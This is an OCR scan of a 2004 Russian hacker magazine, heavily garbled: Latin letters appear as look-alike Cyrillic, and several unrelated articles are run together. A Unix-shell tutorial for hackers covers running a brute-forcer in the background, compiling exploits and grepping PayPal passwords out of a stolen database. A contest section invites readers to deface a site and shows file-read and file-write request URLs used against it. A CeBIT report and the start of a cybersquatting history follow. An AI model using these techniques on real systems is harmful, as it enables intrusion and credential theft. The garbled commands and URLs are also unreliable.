Итак, предположим, что тебе выделили поль- 
зовательский доступ на сервер. Администра- 
тор машины объявил ІР-адрес, логин и па- 
роль, а затем поспешно удалился, оставив 
тебя наедине с сервером. Не бойся, после 
проведения практического экскурса у тебя не 
будет затруднений в управлении ІІпіх-тачкой. 
В первую очередь тебе нужно скачать ЗЗН- 
клиент, специальную программу, при помо- 
щи которой ты будешь подключаться к серве- 
ру. Пусть это будет РиТТѴ 
(ІіЙрУ/№е.еаі11і]і/"5діаіІіат/риЙу/Іаіе5І/х86/рииуле) І 
который настраивается без особого гемор- 
роя. Запускай его и в самой первой формоч- 
ке вводи выданный ІР-адрес и указывай тип 
протокола - ЗЗН. Теперь можешь нажать 
кнопку «Ореп». Если все нормально, перед 
тобой появится окошко с запросом имени 
пользователя. Чего же ты медлишь? Вводи 
его :). Затем аналогичным образом забивай 
пароль и входи в систему. 

В зависимости от интерпретатора, ты уви- 
дишь приглашение для ввода команд. Обыч- 
но оно выглядит так: 

[изег@Ііо$і изег]$ 

где изег - имя пользователя, которое ты вво- 
дил при входе, а Ііозі - первая часть хоста сер- 
вера. Это приглашение характерно для инте- 
рпретатора ЬазМ. Бывает, что он отсутствует. В 
этом случае начальная строка будет такова: 

ІіозіЗ 

где Ііозі - имя сервера. 

По этим признакам ты точно поймешь, что 
попал по адресу :). Сама управляющая сре- 
да, в которую ты зашел, называется кон- 
солью либо терминалом. Теперь самое время 
консольно порулить сервером и насладиться 
всеми прелестями шелл-доступа. Как сказал 
наш первый космонавт, поехали! 

^знакомство с системой 

В первую очередь тебе следует знать, на ка- 
кой системе тебе дали шелл. Эта инфа пона- 
добится в дальнейшем при установке какой- 
нибудь программы и т.п. Даже если админ 
клянется, что на компе 512 ЭЭР, это может 



быть совсем не так :). Поэтому для пущей 
уверенности необходимо набрать ряд ко- 
манд, которые четко и ясно покажут конфигу- 
рацию сервака. Узнать базовую инфу о сис- 
теме поможет команда ипате. Но запрос без 
параметров покажет лишь название операци- 
онки без дополнительных данных. Этот вари- 
ант не для тебя :). Поэтому выполняй такую 
команду: 

ипате -а 

Ты видишь, что в двухстрочном выводе пока- 
залась инфа, характеризующая операционку. 
Здесь тебе и название системы, и версия яд- 
ра, и время установки ІІпіх. Далее можно осу- 
ществить следующие собирательные запросы: 

саі /ргос/ѵегзіоп 

(ІНі 

іор 

рз ах 

йо 

Первая команда расскажет, какой именно 
дистрибутив установлен на сервере. Второй 
запрос объявит размер существующих разде- 
лов и остаток свободного места в них. Ко- 
манда Іор позволит увидеть все активные 
процессы и размер оперативной памяти. Би- 
нарник рз покажет тебе собственные процес- 
сы. Для отображения абсолютно всех про- 
цессов (вывод будет похожим на Іор, но без 
упоминаний о памяти) используется пара- 
метр ах. Наконец, командный запрос ѵѵМо по- 
кажет инфу о других пользователях, которые 
в данный момент находятся в системе. В ря- 
де случаев это может быть очень полезно. 

^УСТПНПВПИВПЕИ СОФТ 

С системой ты познакомился. Теперь ты знаешь 
конфигурацию своего шелла, что весьма полез- 
но. Но я так и не ответил на твой наболевший 
вопрос: зачем тебе может понадобиться шелл? 
Да, практиковаться в ипіх-командах - это, конеч- 
но, полезное занятие, но что мешает установить 
на домашний комп І_іпих и учиться на нем? От- 
вечаю: доступ к удаленному шеллу полюбился 
хакерам из-за того, что они могут установить в 
системе произвольный сетевой софт и пользо- 
ваться им в свое удовольствие. Скажем, никто 
не запрещает тебе поставить I ВС-бота, рзуЬпс, 
прокси или сокс-сервер и прочие полезные ве- 
щи. И все эти сервисы будут постоянно висеть в 
инете и радовать твой взор. Сечешь фишку? :) 
Но опять же, для того чтобы поставить софтину, 
нужно обладать определенными навыками. Сей- 
час я расскажу тебе, как водрузить на шелл из- 
вестного бота под названием еддбгор. Меха- 
низм одинаков для многих проектов, поэтому, 
опираясь на нижеописанную методику, можно 
заинсталлить любое приложение. Сперва необ- 
ходимо скачать файл из инета. Для этого следу- 
ет знать точную ссылку на него. Для даунлоада 
архива выполняй следующую команду: 

ѵѵдеі Шр://$егѵег.сот/едд( 1 гор.іаг.д 2 

Утилита ѵѵдеі в большинстве случаев устанав- 
ливается на сервер по умолчанию. Если ее в 
системе не будет, пинай твоего администрато- 
ра и проси ее заинсталлировать либо попро- 
буй заюзать ее аналог - Теперь нужно 
распаковать архив. Обычно софт запаковывают 
архиватором дгір, предварительно собрав спи- 
сок файлов проекта компоновщиком Іаг. Чтобы 
разархивировать все это добро, командуй 



іаг и\ еддбгорТаг.дг 

Затем перейди в каталог проекта командой 
сб еддбгор. Если вдруг такого каталога не 
обнаружится, используй запрос Із -Іа, кото- 
рый исправно покажет всю файловую струк- 
туру в текущем каталоге. Далее начинается 
самое интересное. Внутри папки еддбгор ты 
увидишь какие-то непонятные файлы и вло- 
женные директории. Тебе нужно сконфигури- 
ровать твоего будущего бота под операцион- 
ную систему. Это реализуется при помощи 
скрипта сопТідиге, расположенного в корне- 
вом каталоге проекта: 

./сопЛдиге --ргеПх=/Іште/Іодіп/туІюІ 

В данной команде я использовал символы 
«./», которые определяют, что исполняемый 
файл лежит в текущем каталоге. Параметр 
ргеТіх, передаваемый скрипту, говорит о том, 
что проект будет установлен в папку 
/Ііоте/Іодіп/туЬоІ, расположенную в твоем 
домашнем каталоге. Это очевидно, поскольку 
у тебя нет прав, чтобы ставить бота в другой 
каталог. Запомни, что в случае непривилеги- 
рованного ипіх-шелла полный доступ имеется 
лишь к твоей домашней директории. Соотве- 
тственно, все установленные проекты долж- 
ны находиться только там. 

После того как сценарий закончил свою рабо- 
ту, необходимо скомпилировать бота. Не за- 
бывай, что эггдроп написан на языке Си. Что- 
бы превратить сишные файлы в исполняемые 
бинарники, нужно воспользоваться встроен- 
ным компилятором дсс. Весь алгоритм сборки 
уже описан в специальных сценариях. Тебе 
лишь нужно их активировать. Достигается это 
командой таке. Наконец, когда сборка завер- 
шена, нужно перенести конфигурационные и 
исполняемые файлы на постоянное место 
обитания, то есть в папку туЬоі Делается это 
с помощью команды таке іпзіаіі. 

Далее от тебя требуется сконфигурировать 
эггдропа и запустить его. О том, как это сде- 
лать, ты можешь почитать на страницах руне- 
та, благо статей по установке еддбгор неме- 
рено. Сейчас для тебя важно запомнить, что 
для установки любого проекта нужно выпол- 
нить шесть заветных команд. Вот они: 

ѵѵдеі Мф://рго]'есІсот/рго]Міаг.д 2 
іаг п\ ргоіесШг.ді 
сб ргсдесі 

./сопЛдиге -рге!іх=/Ііоте/твой_логин/ргоіегіпате 
таке 

таке іпзіаІІ 




л Исходники люби- 
мого бота можно 
найти на Пр-серве- 
ре Кр.еддііе- 
асіз.огд. Точной 
ссылки недам, 
найди ее сам с по- 
мощью консольно- 
го клиента :). 




л Чтобы замочить 
нерадивый про- 
цесс, используй ко- 
манду кіІІ -9 иден- 
тификатор или кіІІаІІ 
-9 имя программы. 
Идентификатор мо- 
жет быть получен с 
помощью запроса 
рз. Циферка 9 озна- 
чает смертельный 
сигнал, от которого 
еще никому не уда- 
валось уйти :). 




Первые команды хакера 
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валом 





л Бывает, что архив 
какого-либо проек- 
та запакован с по- 
мощью Ьгір2. Что- 
бы открыть такой 
архив, используй 
команду іаг хіі 
агсИіѵе.іаг.Ьг2. 



а Во РгееВЗБ вме- 
сто таке может 
быть использована 
команда дтаке. Ее 
можно попробовать 
применить, если 
сборка не увенча- 
лась успехом. 





Скачиваем и конфигурируем бота 



Бывают исключения, когда, например, в ка- 
талоге с проектом отсутствует сопТідиге. В 
этом случае можно смело пропустить соот- 
ветствующий шаг. 

^ Файлы и папки 

При работе с шеллом тебе придется много 
перемещаться по файловой системе. Это мо- 
жет быть процесс редактирования какого-ни- 
будь конфига, анализ журналов или просто 
запись произвольных данных. Знатоки ІІпіх 
рекомендуют использовать встроенный редак- 
тор ѵі, однако для новичка (то есть для тебя) 
этот могучий редактор будет слишком сложен. 
Лучше всего воспользоваться оболочкой тс 
(МісІпідМ Соттапсіег), которая, опять же по 
умолчанию, входит в состав известных дист- 
рибутивов. Просто набери ключевое слово 
«тс» в консоли, и перед тобой зарисуется 
красивая оболочка, чем-то напоминающая до- 
совский Нортон. По возможностям тс опере- 
жает любой консольный менеджер: тут и 
встроенный Йр-клиент, и удобный редактор 
файлов, и многое другое. Кстати, о редакторе: 
с помощью горячей клавиши РЗ ты можешь 
посмотреть любой файл, а нажав Р4 - редак- 
тировать его. В общем, с этой простой и в то 
же время функциональной оболочкой разбе- 
рется человек, впервые увидевший ІІпіх. Э 
то я тебе как специалист говорю :). 

А И ЗТО ВСЕ? 

Нет, это не все :). Помимо работы с файла- 
ми и установки софта, ты можешь юзать 
встроенные консольные приложения. В ти- 
пичной системе имеются следующие сете- 




Собираем бота 



вые клиенты и полезные бинарники, которые 
существенно упростят твою работу: 

л Іупх, Ііпкз: ѵѵѵѵѵѵ- браузеры, которые 
покажут тебе веб-страницу прямо в консоли. 
Параметр запуска - любая ссылка. Например 
Ііпкз мшатЫег.ш. 

л Яр: Йр-клиент. Очень похож на виндовый, 
поэтому разобраться в нем - раз плюнуть. 

л Нозі: превращает ІР-адрес в символь- 
ный и наоборот. 

л ззИ: ззіі-клиент. С его помощью ты мо- 
жешь прицепиться на другие шеллы прямо 
из консоли! Для этого используй запрос ззіі 
имя_пользователя@ір-шелла. 

л Іеіпеі: телнет всегда поможет соеди- 
ниться с любым Іср-портом на произволь- 
ном сервере. Я сам использую эту команду 
по десять раз на дню :). Формат: Іеіпеі ад- 
рессервера порт. 

л дсс: встроенный компилятор. Если 
вдруг тебе захотелось собрать вражеский 
эксплойт, командуй «дсс ехріоіі.с -о ехріоіі». 
В итоге ты получишь исполняемый файл 
ехріоіі в текущем каталоге. 

л регі: интерпретатор известного тебе 
языка программирования :). К примеру, если 
ты захотел запустить консольный брутфорс 
на долгий срок, используй команду регі 
./Ьпйейжю.рІ &. В данном контексте символ 
«&» стартует переборщик в фоновом режиме. 
Даже если ты покинешь шелл, твой брутфорс 
будет работать, работать и работать :). 

. Г\п&. консольный поиск файлов. Если 
ты уже вырос из окошечек тс, то эта коман- 
да тебе здорово пригодится. Ее основные 
аргументы - райі и йіепате. Скажем, чтобы 
найти файл раззѵѵсІ.М, нужно написать «ТіпсІ 
/ -пате раззѵѵсІ.М». Надо сказать, что ко- 
манда имеет очень много опций, которые 
описаны в страницах помощи. 

л тап: отображение страницы помощи к 
определенной программе. Допустим, тебе за- 
хотелось узнать все опции йпсГа. Просто ско- 
мандуй «тап ТіпсІ» и усваивай информацию. 

л дгер: универсальный фильтр потока. 
Команда поможет найти нужную строку в 
указанном файле. Например чтобы отобра- 
зить все пароли на раураі -сервис из базы, 
нужно выполнить запрос дгер -і раураі разз- 
ѵѵсі.зді. Здесь опция -і заставляет игнориро- 
вать регистр искомого слова. 

К сожалению, в одной маленькой статье 



невозможно уместить все прелести консоль- 
ной работы. Но толчок к освоению ипіх я тебе 
дал. Теперь ты уже не будешь шарахаться от 
слов «шелл», «аккаунт» и «консоль». После то- 
го как ты все-таки выклянчишь доступ к сер- 
веру у знакомого админа, ты никогда не зате- 
ряешься среди консольных команд и сложных 
программ. А через пару лет активной работы 
с консолью ты станешь высококлассным ипіх- 
специалистом. А теперь дуй к админу просить 
аккаунт. Только пиво взять не забудь :).^С 
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ХПКЕР/№03(63]/2004 



ВНЕ! 





Е сли ты часто читаешь наш журнал, то, думаю, 
не раз слышал о переполнениях буфера, мас- 
сивах, классах и т.д. Собственно, в этом кон- 
курсе у тебя есть отличная возможность проверить 
свои навыки в подобных хакерских атаках. Какое 
именно приложение надо отравлять - это ты сам ре- 
шай. Основная твоя задача - получить ѵѵеЬ-шелл и 
дефейснуть сайт. Если ты еще не знаком с перепол- 
нениями, скорее доставай Х-спец ВиТСег ОѵеіТІоѵѵ и 
читай его от корки до корки (электронную версию 
журнала найдешь здесь: ѵѵш.хакер.ги/агіісІе$/пада2іпе/2004.а$р). 
Предупреждаю сразу, решения задачи с использо- 
ванием шелл-кода мы не примем. И еще, когда бу- 
дешь дефейсить сайт, оставь ссылочку на ориги- 
нальную главную страницу ѵѵѵѵѵѵ.расіопак.ги, чтобы все ос- 
тальные тоже могли похаксорить. Описание про- 
хождений присылай на ЫоосІех@геаІ.хакер.ги. 

Прошлый конкурс первым прошел }зРу{. Ему 
предлагается написать нам с того ящика, с кото- 
рого он уже нам писал, и приехать за призом :). 



Л кок пройти январский конкурс 

Ну а теперь давай я расскажу, что надо было сде- 
лать, чтобы получить пароль в предыдущем Х-кон- 
курсе. Скрипт ітаде.рИр, помимо картинок, умеет 
читать любые файлы на сервере. Если в строке зап- 
роса мы напишем ітаде.рПр?ітаде=зсгір1:.рІір, то, 
просмотрев это дело с помощью ѵіеѵѵ зоигсе в Опе- 
ре, увидим исходник файла зсгірТрІір. Точно так же 
можно просмотреть и ітаде.рИр. Изучив код, легко 
понять, что приватные обои лежат в некой папке, 
имя которой и есть искомый пароль. В сопІасТрІір 
видим, что можно через строку запроса задать еще 
один элемент массива ѵѵТМе и тем самым записать 
любой М-файл на сервере. Например ѵѵѵѵѵѵ.расіопак.ги/соп- 
ІасІрІір?пате=ВІооВеХкаіІ=Ыоо(1ех@геаІ.хакер.гиМ=Ы&ііѵІіеге=3&ѵѵ(іІе[3]=іе5ШІе 
допишет в ІезШе.ЪсІ такую инфу: 

Ргош: ВІлоОеХ 
МаіІ: Ыоо(1ех@геаІ.хакер.ги 
Тех!: іе$і 



При взгляде на исходник пеѵѵз.рИр станет понятно, что, 
слегка изменив файл пеѵѵз.М, можно заставить новост- 
ной скрипт прочитать содержимое директории «.». 

Для того чтобы таким образом изменить пеѵѵз.ріір, 
делаем запрос: 

ѵѵѵѵѵѵ.расІопак.ги/соп1ас1:.рНр?пате=ВІоо0еХ&таіІ=Ыоо(]ех@геаІ.хакер.ги&1:ех1:=;ааа:[іаск;.:ЫаЫаЫа;&ѵѵ[і 

еге=ЗМе[3]=пеѵѵ$ 

Теперь, чтобы пеѵѵз.ріір прочитал «.», достаточно 
аргументом задать ісІ=Ііаск (Нир://ѵ\ллл/ѵ.расІопак. 
ги/пе\л/з.рІір?ісІ=Ііаск). Он выведет нам кучу ка- 
кой-то инфы, среди которой можно отыскать 
пароль тедаІопдипЬги1аЫераззѵѵогб05. 







И тянись вокруг и ты увидишь огромные просторные залы, заполненные стендами, рядом с которыми толпятся люди. Повсюду видны знако- 
мые названия: ІВИ, Прріе, ПИП, Иокіа, ВеІІ, Попу. П от обилия разнообразной техники, начиная с огромных плазменных мониторов, заканчи- 
вая миниатюрными чипами, разбегаются глаза. Ты не знаешь, с чего начать, куда пойти, и смотришь по сторонам, стараясь впитать в себя 
как можно больше информации. 9 тебя есть 7 дней, чтобы обойти все залы, посмотреть все стенды, пощупать все девайсы. Но хватит пи их, 
вот в чем вопрос. Ведь ты не где-нибудь, а на крупнейшей ІТ-выставке мира СеВіІ. 



ОБЗОР КРУПНЕЙШЕЙ ІТ-ВЫСТОВКИ МИРО 




Л от бытовой ярмарки ао 
информационного центро 

В начале 60-х годов, когда начал- 
ся электронный бум, в Герма- 
нии резко увеличилось количе- 
ство компаний, производящих 
офисное оборудование. Чтобы 
рекламировать свою продук- 
цию, им было нужно место, где 
ее можно продемонстрировать 
потенциальным покупателям. В то время боль- 
ших выставочных комплексов, посвященных 
электронике, в стране еще не было, поэтому 
ОеіЛзсІте Меззе АО - компания, занимающаяся 
торговыми отношениями и организацией выс- 
тавок, решила направить все свои силы и ре- 
сурсы на создание такого комплекса. Крупней- 
шим павильоном в стране была Ганноверская 
ярмарка, которая в основном демонстрировала 
бытовые предметы. Своими огромными разме- 
рами этот торговый комплекс идеально подхо- 
дил для воплощения планов ОеіЛзсІте. Для тех- 
нической выставки выделили НаІ1 1 - массив- 
ное трехэтажное здание, в котором только пер- 
вый этаж занимал площадь 70 тысяч квадрат- 
ных метров, со 750 установленными кабинками 
на верхнем этаже и гаражом, вмещающим 
2000 машин. Вначале выставку хотели назвать 



СеВоІ, от немецкого «Центр офисных и про- 
мышленных технологий», но в конце концов ос- 
тановились на СеВіІ - «Центр информационных 
технологий», так как информационные техноло- 
гии были на тот момент самой стремительно 
развивающейся областью. 

СМИ постарались, чтобы выставка стала все- 
мирно известной и тысячи компаний направи- 
ли заявки на участие. Вскоре, несмотря на ка- 



жущуюся неиссякаемой вместимость НаІ1 1 , 
свободное место закончилось. Чтобы решить 
эту проблему, Оеиізсіте Меззе АС объявила об 
открытии НаІІ 2 и НаІ1 1 8, а еще через пару лет 
- НаІІ 3. Но никакие здания и никакие расшире- 
ния не могли вместить всех желающих, так как, 
казалось, все компании в мире, имеющие хоть 
отдаленное отношение к технологиям, пыта- 
лись занять место на СеВіГ В то время как 




74 




СЕВІТ: ВЕСЬ МИР ХПЙ-ТЕКП В ОДНОМ МЕСТЕ 




арендуемое пространство выросло в 2,5 раза, 
количество участников выросло в 5 раз. 7000 
стендов компаний и более 800 тысяч посетите- 
лей в 1985 году... Это был предельный макси- 
мум того, что можно было выжать из торгового 
комплекса Ганноверской ярмарки. И поскольку 
количество заявок все росло, организатором 
нужно было придумать какое-то решение. 

В ноябре 1 984 года ЭМ АС объявила о том, что 
начиная с 1986 года СеВіТ станет отдельным от 
Ганноверской ярмарки событием. Все эти годы 
обе выставки были дополнением друг другу, и 
решение компании было многими принято в 
штыки. Плюсом было то, что раз в году на про- 
ведение СеВіі можно было выделить весь торго- 
вый комплекс, а месяц спустя информационная 
выставка сменялась бытовой и промышленной. 
Аргументом против было то, что желающих по- 
сетить узкоспециализированную выставку могло 
быть намного меньше. Сами организаторы не 
знали, что из этого выйдет, и с большим нетер- 
пением ждали презентации новой СеВіі 1 2 мар- 
та 1986 года. Только этот день мог показать, 
правильным было решение или нет. 

Л УСПЕХ СЕВІТ 

Более 2000 компаний демонстрировали свою 
продукцию на 200 тысячах квадратных метров. 

А общее количество гостей выставки составило 
334400. Неплохой старт, оправдавший надежды 
организаторов. Несмотря на это, дебаты по по- 
воду разделения СеВй и остальной выставки 
продолжались еще долгие годы. Впрочем, те- 
перь стало очевидным, что от разделения СеВіі 
только выиграл. Благодаря освободившемуся 
месту, компании могли украшать свои стенды 
огромными щитами, экранами и витринами, 
привлекающими посетителей. Раньше им при- 
ходилось ютиться буквально на пятачке. 

За два дня до начала СеВй-87 невиданный ра- 



нее снегопад обрушился на Ганновер, метро- 
вый слой снега накрыл все вокруг. Несмотря на 
это, выставка началась ровно в срок, во многом 
благодаря скоординированной работе многих 
тысяч сотрудников и добровольных помощни- 
ков. Более 400 тысяч гостей посетило ЗпоѵѵВф 
как окрестили выставку в прессе. 

Следующие годы развитие СеВй шло стреми- 
тельно, и вскоре все газеты называли ее крупней- 
шей выставкой новых технологий и ГГ-событѵіем 
года. Информационные и технологические ком- 
пании со всего мира присылали заявки на учас- 
тие, очередь в листе ожидания превысила тысячу 
единиц. Даже несмотря на реконструкцию поме- 
щений и добавление новых зданий, комплекс ед- 
ва ли мог удовлетворитъ запросам компаний. 
СеВіі-95 собрал рекордное количество гостей и 
участников. 61 1 1 компаний установили стенды 
в торговом комплексе, а посмотреть на их но- 
винки собралось 755 тысяч человек, включая 
100 тысяч иностранцев. Такой выставки история 
еще не знала. Тем не менее, по мнению специ- 
алистов, популяризация СеВй шла в ущерб ее 
качеству. Раньше выставка была узкоспециали- 
зированной, в одном месте собирались веду- 
щие компании-производители электроники. 
Теперь здесь кого только не было. 

ЭеіЛзсІте Меззе АС была всерьез озабочена 
тем, что выставка теряет профессиональную 
направленность, и после окончания СеВй-95 
решила принять меры. Первое, что они сделали, 
- значительно подняли цены на аренду места. 
Во-вторых, продолжительность выставки была 





Сопѵепііоп Сепіег 



сокращена до 7 дней. В-третьих, Эеиізсіте орга- 
низовала отдельную выставку для небольших 
компаний и простых юзеров, где те могли пока- 
зать свои наработки. СеВіі Ноте, как ее назва- 
ли, должна была проходить каждые два года в 
августе, начиная с 1996 года. Но с каждым ра- 
зом количество посетителей и участников сни- 
жалось, и в 2000 году СеВй Ноте попросту не 
состоялась, так как не набралось достаточное 
количество участников (в 1 996 году их было 
632, а в 1998-м - уже 586). 

Несмотря на провал «домашнего» СеВф его 
старший брат продолжал привлекать к себе 
внимание. Выставка СеВіІ-2004 в очередной раз 
побила все рекорды. 6200 компаний демон- 
стрировали свою продукцию на территории 320 
тысяч квадратных метров. Эту выставку можно 
назвать и самой международной. 3000 компа- 
ний приехали сюда из 64 стран мира. Успех 
СеВіІ вдохновил организаторов создать нес- 
колько филиалов своего детища. Под лозунгом 
«СеВй ѴѴогІсІѵѵісІе Еѵепіз» локальные «Цэбиты» 
стали проводиться в Турции, Китае и Австралии. 

Л СЕВІТ СЕГОДНЯ 

Большинство участников выставки после демо- 
нстрации своих продуктов на СеВіі утверждают, 
что продажи возросли на несколько процентов. 
Многим удается заключить выгодные контракты 
прямо во время выставки, так как среди посети- 
телей немало представителей крупных компа- 
ний, специально приехавших для покупки новой 
техники или заключения долгосрочных догово- 
ров. В 2004 году желание инвесторов вложить 
деньги в новичков ІТ-рынка достигло своего пи- 
ка. Более половины инвестиционных компаний 
приехали на СеВіі с конкретной целью - найти 
перспективных разработчиков и инвестировать 
в их проекты свои миллионы. 

Весь комплекс Ганноверской ярмарки поделен 
на кучу просторных залов, каждый из которых 
имеет свой порядковый номер. В зависимости 
от направления деятельности компаний, их раз- 
мещают в разных частях комплекса. Разделы, 
которые традиционно представлены на СеВіТ 
информационные технологии, телекоммуника- 
ции и компьютерные сети, программное обес- 
печение, спутниковая связь, мобильные теле- 
системы, радиосвязь и радиовещание, видео- 
системы, обработка речи, технологии безопас- 
ности и системы аутентификации, банковские 
технологии, контрольно-измерительное обору- 
дование, телевидение, источники питания, на- 
учные исследования и технологии. 

Каждый компания борется за внимание посетите- 
лей, поэтому нередко на выставке можно встре- 
тить настоящие произведения стендового искус- 
ства. Телефонные компании сооружают огромные 
макеты своих новейших телефонов, кто побогаче 
- устанавливает рядом машины стоимостью под 
миллион долларов, известным брендам достаточ- 
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Насколько сложно вам ориентироваться в том, каким стендам 
и демонстрируемым продуктам на выставке уделить внимание? 

- Очень сложно - 64% 

- Сложновато - 31% 

- Не имею с этим проблем - 5% 

Расставьте целевые приоритеты относительно посещения 
выставки. 

- Узнать о новых достижения хай-тека - 33% 

- Узнать, что нового предложат конкретные компании - 60% 

- Узнать о новинках среди конкретной продукции - 49% 

В каком уголке мира вы живете и работаете? 

- Германия - 37% 

- Западная Европа - 28% 

- Центральная/Восточная Европа - 13% 

- Северная Америка - 6% 

- Азия - 6% 



В какой вы сфере работаете? 




- Промышленность (машиностроение, компьютеры) - 28% 

- Производство (продовольствие, лекарства) - 13% 

- Сервисное обслуживание (финансы, медицина, компьютеры, 
телекоммуникации) - 31% 

- Область продаж - 13% 

- Образование - 3% 

- Правительство, военные структуры - 2% 

- Другое - 1 0% 




Демонстрация достижений 
робототехники на СеВіі-2004 




Оу от Запуо 



но указать большими буквами название своей 
компании. Некоторые предпочитают завлекать 
соблазнительными барышнями, которые улыба- 
ются всем посетителям и рассказывают о фир- 
ме. А кто-то наряжается в экзотические костюмы 
и танцует на миниатюрном подиуме. 

Многие угощают едой и напитками, понятное 
дело, совершенно бесплатно. Если компания 
разработала игровую приставку или автомат, 
скорее всего, она установит их в своем па- 
вильоне, чтобы каждый желающий мог поиг- 
рать и составить свое мнение. Самыми попу- 
лярными залами в 2004 году были второй, 
где находились крупнейшие производители 
техники (ЗОМѴ, Ж)), и 26, где свои новинки 
демонстрировали ведущие производители 




мобильных телефонов ([\Іокіа, Зіетепз). 
Помимо демонстрации продуктов, участники 
выставки могут также принять участие в кон- 
ференциях, которые проводятся во время 
СеВіГ В 2004 году в рамках ІСТ ѴѴогІсІ Рогит 
@ СеВіі около 30 авторитетнейших предста- 
вителей ведущих компаний делились своими 
мнениями о перспективах и проблемах ІТ- 
сектора. Всего же лекторов было около 250, 
а людей, прослушавших их выступления, - 
более 10 тысяч. Большое внимание уделяет- 
ся на форуме новым технологиям в области 
медицины. СеВіІ стал чуть ли не центровым 
медицинским риаллайфовым форумом, на 
который съезжаются все ведущие специа- 
листы в этой области. Так что если ты буду- 
щий врач и интересуешься тем, какой хай- 
тек появился за последний год в медицине, 
на СеВй тебе определенно не будет скучно. 
Выставка также является отличным местом 
для расширения круга знакомств. Работники 
маленьких компаний, например, могут пооб- 
щаться со своими коллегами из компаний- 
лидеров рынка и перенять опыт. Обычно на 
СеВіІ царит атмосфера дружелюбия и люди 
охотно общаются друг с другом. 

Помимо ІТ-специалистов, выставка привлекает 
многих политиков. В прошлом году ее посети- 
ло более ста делегаций из 27 стран мира, сре- 
ди которых можно было увидеть известных лю- 
дей, ведущих политических деятелей. Полити- 
ки понимают, что технологии - одна из важней- 
ших областей, и приезжают, чтобы своими гла- 
зами увидеть, насколько эта область развита в 
их стране и в мире. 

Среди русских компаний, регулярно участву- 
ющих в СеВф много известных брендов: 



АВВУУ ЗоЙѵѵаге Ноизе, Оойог ѴѴеЬ, Рогтога, 
Лаборатория Касперского, №1ѵѵогк Зузіет 
Сгоир, 1С, Місгозузіетз, Сатта-Сепіег, 

ТорЗ Визіпезз, Автопромимпорт, Епіегргізе 
ІпТогта1:іоп Зузіетз, АВ ТесМпоІоду и десятки 
других. Самый яркий стенд, пожалуй, у Лабо- 
ратории Касперского, которая демонстрирует 
все свои продукты, начиная Анти-хакером, 
заканчивая Анти-спамом. На СеВй-2005 Рос- 
сия будет представлена как страна- партнер, 
в связи с чем нашим представителям пообе- 
щали выделенное место и возможность соз- 
дания крупномасштабной экспозиции, кото- 
рую откроет сам Путин. Поэтому в этом году 
выставка для России будет особенной. 

Еще немного о выставочном комплексе. Состо- 
ит он из 27 отдельных кампусов, занимающих 
общую площадь в 500 тысяч квадратных мет- 
ров. Все имеют разную архитектуру, а некото- 
рые даже получили престижные международ- 
ные архитектурные награды. 27-й кампус пост- 
роили совсем недавно - в конце февраля 2002 
года. На его сооружение ОеіДзсІте Меззе АС 
потребовалось всего полтора года, и это был 
последний крупный проект относительно рекон- 
струкции Ганноверской ярмарки. За последние 
10 лет организаторы вложили 665 миллионов 
долларов в расширение и ремонт помещений. 

В самом центре, окруженный выставочными зала- 
ми, находится СопѵепНоп Сепіег - настоящий ар- 
хитектурный шедевр, жемчужина торгового комп- 
лекса. Здесь проводятся пресс-конференции, чи- 
таются лекции и организуются приемы. Также 
Здесь располагается штаб организаторов СеВіГ 
В каждом зале имеются все виды источников 
питания и высокоскоростная сеть. Также в лю- 
бом зале есть какой-нибудь ресторанчик или 
бистро, в котором можно заказать блюда италь- 
янской, французской или любой другой кухни, а 
любителям Макдональдсов - гамбургер. 

Цена входного билета на выставку не так уж ве- 
лика: 32 евро на один день и 70 на все дни, 
причем для студентов скидка 50%. Намного 
больше приезжие потратят на проживание в 
Ганноверских отелях, самые дешевые номера в 
которых стоят от 1 00 евро в сутки. Перелет по 
маршруту Москва - Ганновер - Москва обой- 
дется примерно в $400. И, конечно, стоит зах- 
ватить с собой немного налички, чтобы купить 
на выставке какой-нибудь гаджет, благо выбор 
там просто немеренный, а цены, конечно же, 
ниже, чем в магазине. 

Можно заодно прогуляться по улочкам Ганно- 
вера - это очень чистый и красивый город, в 
котором и помимо выставки есть на что пос- 
мотреть. Немцы считают Ганновер чуть ли не 
культурной столицей Германии, так как здесь 
можно найти бесчисленное множество музеев, 
художественных выставок, а по количеству про- 
водимых тут концертов и развлекательных ме- 
роприятий он едва ли не превосходит Берлин. 
СеВй-2005 пройдет уже скоро, с 10 по 1 6 марта 
2005 года. И количество компаний, которые по- 
дали заявки на участие, уже превысило прошлые 
показатели. Так что если тебе надоели российс- 
кие морозы и ты хочешь отдохнутъ, а заодно пос- 
мотреть на крупнейшую ярмарку хай-тека - бери 
друганов/девушку, собирай чемоданы и отправ- 
ляйся в путъ. Будет о чем внукам рассказать.!}^ 
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• рецензии на фильмы (отечественные и 
зарубежные) 

• оценка качества изображения и звучания 

• информация о дополнительных материалах 

• биографические справки о самых известных 
кинорежиссерах 

• словарь технических терминов 

• хит-парад 25 -ти лучших фильмов на йѴО 



ПОДАРОК В КАЖДОМ ЖУРНАЛЕ: ОѴО-ДИСК ДЛЯ НАСТРОЙКИ ДОМАШНЕГО КИНОТЕАТРА 










нтернет все быстрее и быстрее входит в нашу жизнь. Он впияет на нас, и с этим трудно не согпаситься. Мы давно употребляем такие 
снова, как спаи и фпуд, в обычной, оффлайновой жизни. О иногда при написании обычных писем так и норовим вставить смайлик. Уже 
практически нет людей, не понимающих смыспа вышеупомянутых определений - уж спишком много о них говорят и пишут. Этот список 
не так давно пополнился еще одним иноземным сповечком, о существовании которого многие пока не подозревают... 




ИСТОРИЯ КРЕМНИЕВОЙ ПОЛИНЫ 



к. 




А ПРЕДЫСТОРИЯ 

О алекие 90-е... Интернет толь- 
ко-только набирает популяр- 
ность, количество пользова- 
телей медленно, но верно 
ползет вверх. Некоторые из 
них создают свои сайты, 
благо процедура регистра- 
ции была бесплатной и пре- 
дельно простой. При этом 
принцип был такой: не пользуешься сам - 
отдай другим. То есть, зарегистрировав 
домен, необходимо было его поддержи- 
вать, доказывать свое право на него. В 




Вот так наглядно представлена вся доменная иерархия 



случае простоя он безоговорочно переда- 
вался первому подавшему на него заявку. 
Начиная с 1 995 года компания №Іѵѵогк 
Зоіийопз решила, что раздавать домены всем 
подряд слишком жирно, и ввела оплату. С 
одной стороны, это правильно - к этому все 
и шло. Однако многие владельцы страничек 
отказались платить, возмущаясь политикой 
компании. Именно тогда появились люди, 
которые посмотрели на проблему с другой 
стороны. Когда количество сайтов едва ли 
достигало отметки в восемь сотен и все они 
могли разместиться на одном СО, организа- 
ции не спешили укрепиться в Сети. А зря... 

В один прекрасный день никому не извест- 
ный парень, житель Дубны, Денис Гледенов 
